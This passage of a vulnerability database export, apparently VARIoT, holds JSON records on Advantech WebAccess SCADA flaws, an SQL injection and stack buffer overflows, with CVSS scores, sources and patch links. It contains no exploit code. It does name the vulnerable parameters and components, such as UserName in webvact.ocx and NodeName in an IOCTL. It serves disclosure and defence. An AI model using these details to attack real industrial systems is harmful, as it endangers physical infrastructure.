"IVD", "id": "f6a19415-1129-4719-ad81-c1d464552563" }, { "db": "ZDI", "id": "ZDI-17-043" }, { "db": "CNVD", "id": "CNVD-2017-00553" }, { "db": "VULHUB", "id": "VHN-113357" }, { "db": "BID", "id": "95410" }, { "db": "JVNDB", "id": "JVNDB-2017-001616" }, { "db": "CNNVD", "id": "CNNVD-201701-328" }, { "db": "NVD", "id": "CVE-2017-5154" } ] }, "id": "VAR-201702-0675", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "f6a19415-1129-4719-ad81-c1d464552563" }, { "db": "CNVD", "id": "CNVD-2017-00553" }, { "db": "VULHUB", "id": "VHN-113357" } ], "trust": 1.33470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "f6a19415-1129-4719-ad81-c1d464552563" }, { "db": "CNVD", "id": "CNVD-2017-00553" } ] }, "last_update_date": "2024-11-23T22:01:18.956000Z", "patch": { "_id": null, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-012-01" }, { "title": "Advantech WebAccess \u0027updateTemplate.aspx\u0027 SQL Injection Vulnerability Patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/88106" }, { "title": "Advantech WebAccess SQL Repair measures for injecting vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=66985" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-043" }, { "db": "CNVD", "id": "CNVD-2017-00553" }, { "db": "JVNDB", "id": "JVNDB-2017-001616" }, { "db": "CNNVD", "id": "CNNVD-201701-328" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-89", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-113357" }, { "db": "JVNDB", "id": "JVNDB-2017-001616" }, { "db": "NVD", "id": "CVE-2017-5154" } ] }, "references": { "_id": null, "data": [ { "trust": 3.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-012-01" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/95410" }, { "trust": 1.1, "url": "https://www.tenable.com/security/research/tra-2017-04" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5154" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-5154" }, { "trust": 0.6, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-043/" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" }, { "trust": 0.3, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-043/ " }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-012-01 " } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-043" }, { "db": "CNVD", "id": "CNVD-2017-00553" }, { "db": "VULHUB", "id": "VHN-113357" }, { "db": "BID", "id": "95410" }, { "db": "JVNDB", "id": "JVNDB-2017-001616" }, { "db": "CNNVD", "id": "CNNVD-201701-328" }, { "db": "NVD", "id": "CVE-2017-5154" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "f6a19415-1129-4719-ad81-c1d464552563", "ident": null }, { "db": "ZDI", "id": "ZDI-17-043", "ident": null }, { "db": "CNVD", "id": "CNVD-2017-00553", "ident": null }, { "db": "VULHUB", "id": "VHN-113357", "ident": null }, { "db": "BID", "id": "95410", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2017-001616", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201701-328", "ident": null }, { "db": "NVD", "id": "CVE-2017-5154", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-01-18T00:00:00", "db": "IVD", "id": "f6a19415-1129-4719-ad81-c1d464552563", "ident": null }, { "date": "2017-01-12T00:00:00", "db": "ZDI", "id": "ZDI-17-043", "ident": null }, { "date": "2017-01-18T00:00:00", "db": "CNVD", "id": "CNVD-2017-00553", "ident": null }, { "date": "2017-02-13T00:00:00", "db": "VULHUB", "id": "VHN-113357", "ident": null }, { "date": "2017-01-12T00:00:00", "db": "BID", "id": "95410", "ident": null }, { "date": "2017-03-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-001616", "ident": null }, { "date": "2017-01-13T00:00:00", "db": "CNNVD", "id": "CNNVD-201701-328", "ident": null }, { "date": "2017-02-13T21:59:02.707000", "db": "NVD", "id": "CVE-2017-5154", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-01-12T00:00:00", "db": "ZDI", "id": "ZDI-17-043", "ident": null }, { "date": "2017-01-18T00:00:00", "db": "CNVD", "id": "CNVD-2017-00553", "ident": null }, { "date": "2017-11-03T00:00:00", "db": "VULHUB", "id": "VHN-113357", "ident": null }, { "date": "2017-01-23T04:05:00", "db": "BID", "id": "95410", "ident": null }, { "date": "2017-03-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-001616", "ident": null }, { "date": "2017-01-13T00:00:00", "db": "CNNVD", "id": "CNNVD-201701-328", "ident": null }, { "date": "2024-11-21T03:27:09.860000", "db": "NVD", "id": "CVE-2017-5154", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201701-328" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess In SQL Injection vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-001616" } ], "trust": 0.8 }, "type": { "_id": null, "data": "SQL injection", "sources": [ { "db": "IVD", "id": "f6a19415-1129-4719-ad81-c1d464552563" }, { "db": "CNNVD", "id": "CNNVD-201701-328" } ], "trust": 0.8 } }
var-201404-0545
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long UserName parameter. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied UserName string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0545", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "6.0" }, { "model": "webaccess", "scope": "eq", "trust": 1.2, "vendor": "advantech", "version": "7.1" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.1" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "7.0" }, { "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "*" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.1" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.0" }, { "model": "broadwin webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "7.2" } ], "sources": [ { "db": "IVD", "id": "2da7cf70-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf372-463f-11e9-9061-000c29342cb1" }, { "db": "IVD", "id": "1673fa5a-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-075" }, { "db": "CNVD", "id": "CNVD-2014-02260" }, { "db": "BID", "id": "66733" }, { "db": "JVNDB", "id": "JVNDB-2014-001980" }, { "db": "CNNVD", "id": "CNNVD-201404-175" }, { "db": "NVD", "id": "CVE-2014-0770" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-001980" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Tom Gallagher", "sources": [ { "db": "ZDI", "id": "ZDI-14-075" } ], "trust": 0.7 }, "cve": "CVE-2014-0770", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2014-0770", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 2.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-02260", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "2da7cf70-1edf-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "7d7bf372-463f-11e9-9061-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "1673fa5a-2352-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-68263", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0770", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2014-0770", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2014-0770", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2014-02260", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201404-175", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "2da7cf70-1edf-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "7d7bf372-463f-11e9-9061-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "1673fa5a-2352-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-68263", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "2da7cf70-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf372-463f-11e9-9061-000c29342cb1" }, { "db": "IVD", "id": "1673fa5a-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-075" }, { "db": "CNVD", "id": "CNVD-2014-02260" }, { "db": "VULHUB", "id": "VHN-68263" }, { "db": "JVNDB", "id": "JVNDB-2014-001980" }, { "db": "CNNVD", "id": "CNNVD-201404-175" }, { "db": "NVD", "id": "CVE-2014-0770" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long UserName parameter. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied UserName string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. \nAdvantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions", "sources": [ { "db": "NVD", "id": "CVE-2014-0770" }, { "db": "JVNDB", "id": "JVNDB-2014-001980" }, { "db": "ZDI", "id": "ZDI-14-075" }, { "db": "CNVD", "id": "CNVD-2014-02260" }, { "db": "BID", "id": "66733" }, { "db": "IVD", "id": "2da7cf70-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf372-463f-11e9-9061-000c29342cb1" }, { "db": "IVD", "id": "1673fa5a-2352-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-68263" } ], "trust": 3.69 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0770", "trust": 4.7 }, { "db": "ICS CERT", "id": "ICSA-14-079-03", "trust": 3.4 }, { "db": "CNNVD", "id": "CNNVD-201404-175", "trust": 1.3 }, { "db": "CNVD", "id": "CNVD-2014-02260", "trust": 1.2 }, { "db": "BID", "id": "66733", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2014-001980", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2014", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-075", "trust": 0.7 }, { "db": "OSVDB", "id": "105568", "trust": 0.6 }, { "db": "SECUNIA", "id": "57873", "trust": 0.6 }, { "db": "IVD", "id": "2DA7CF70-1EDF-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "IVD", "id": "7D7BF372-463F-11E9-9061-000C29342CB1", "trust": 0.2 }, { "db": "IVD", "id": "1673FA5A-2352-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-68263", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "2da7cf70-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf372-463f-11e9-9061-000c29342cb1" }, { "db": "IVD", "id": "1673fa5a-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-075" }, { "db": "CNVD", "id": "CNVD-2014-02260" }, { "db": "VULHUB", "id": "VHN-68263" }, { "db": "BID", "id": "66733" }, { "db": "JVNDB", "id": "JVNDB-2014-001980" }, { "db": "CNNVD", "id": "CNNVD-201404-175" }, { "db": "NVD", "id": "CVE-2014-0770" } ] }, "id": "VAR-201404-0545", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "2da7cf70-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf372-463f-11e9-9061-000c29342cb1" }, { "db": "IVD", "id": "1673fa5a-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02260" }, { "db": "VULHUB", "id": "VHN-68263" } ], "trust": 1.951177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.2 } ], "sources": [ { "db": "IVD", "id": "2da7cf70-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf372-463f-11e9-9061-000c29342cb1" }, { "db": "IVD", "id": "1673fa5a-2352-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-02260" } ] }, "last_update_date": "2024-11-23T21:45:11.234000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Downloads ::: WebAccess Software", "trust": 0.8, "url": "http://webaccess.advantech.com/downloads.php?item=software" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/GF-1M94V/Advantech-WebAccess/mod_B975C492-56B3-4EBA-8BBB-5B6D3483EE9D.aspx" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03" }, { "title": "Patch for Advantech WebAccess NodeName parameter handling stack buffer overflow vulnerability (CNVD-2014-02260)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/44785" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-075" }, { "db": "CNVD", "id": "CNVD-2014-02260" }, { "db": "JVNDB", "id": "JVNDB-2014-001980" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-68263" }, { "db": "JVNDB", "id": "JVNDB-2014-001980" }, { "db": "NVD", "id": "CVE-2014-0770" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.8, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-079-03" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0770" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0770" }, { "trust": 0.6, "url": "http://osvdb.com/show/osvdb/105568" }, { "trust": 0.6, "url": "http://secunia.com/advisories/57873" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" }, { "trust": 0.3, "url": "http://advantech.vo.llnwd.net/o35/www/webaccess/webaccess_v7.2_beta_version/webaccessversion7.2.htm" }, { "trust": 0.3, "url": "ics-cert.us-cert.gov/advisories/icsa-14-079-03" } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-075" }, { "db": "CNVD", "id": "CNVD-2014-02260" }, { "db": "VULHUB", "id": "VHN-68263" }, { "db": "BID", "id": "66733" }, { "db": "JVNDB", "id": "JVNDB-2014-001980" }, { "db": "CNNVD", "id": "CNNVD-201404-175" }, { "db": "NVD", "id": "CVE-2014-0770" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "2da7cf70-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf372-463f-11e9-9061-000c29342cb1" }, { "db": "IVD", "id": "1673fa5a-2352-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-075" }, { "db": "CNVD", "id": "CNVD-2014-02260" }, { "db": "VULHUB", "id": "VHN-68263" }, { "db": "BID", "id": "66733" }, { "db": "JVNDB", "id": "JVNDB-2014-001980" }, { "db": "CNNVD", "id": "CNNVD-201404-175" }, { "db": "NVD", "id": "CVE-2014-0770" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "2da7cf70-1edf-11e6-abef-000c29c66e3d" }, { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "7d7bf372-463f-11e9-9061-000c29342cb1" }, { "date": "2014-04-11T00:00:00", "db": "IVD", "id": "1673fa5a-2352-11e6-abef-000c29c66e3d" }, { "date": "2014-04-10T00:00:00", "db": "ZDI", "id": "ZDI-14-075" }, { "date": "2014-04-11T00:00:00", "db": "CNVD", "id": "CNVD-2014-02260" }, { "date": "2014-04-12T00:00:00", "db": "VULHUB", "id": "VHN-68263" }, { "date": "2014-04-08T00:00:00", "db": "BID", "id": "66733" }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001980" }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-175" }, { "date": "2014-04-12T04:37:31.627000", "db": "NVD", "id": "CVE-2014-0770" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-04-10T00:00:00", "db": "ZDI", "id": "ZDI-14-075" }, { "date": "2014-04-14T00:00:00", "db": "CNVD", "id": "CNVD-2014-02260" }, { "date": "2014-04-14T00:00:00", "db": "VULHUB", "id": "VHN-68263" }, { "date": "2014-04-08T00:00:00", "db": "BID", "id": "66733" }, { "date": "2014-04-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-001980" }, { "date": "2014-04-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-175" }, { "date": "2024-11-21T02:02:46.737000", "db": "NVD", "id": "CVE-2014-0770" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-175" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerable to stack-based buffer overflow", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-001980" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "2da7cf70-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7bf372-463f-11e9-9061-000c29342cb1" }, { "db": "IVD", "id": "1673fa5a-2352-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201404-175" } ], "trust": 1.2 } }
var-201602-0487
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C79 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy using the NodeName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-142" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-142" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-142", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-142", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-142" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C79 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy using the NodeName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-142" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3247", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-142", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-142" } ] }, "id": "VAR-201602-0487", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:03:19.132000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI 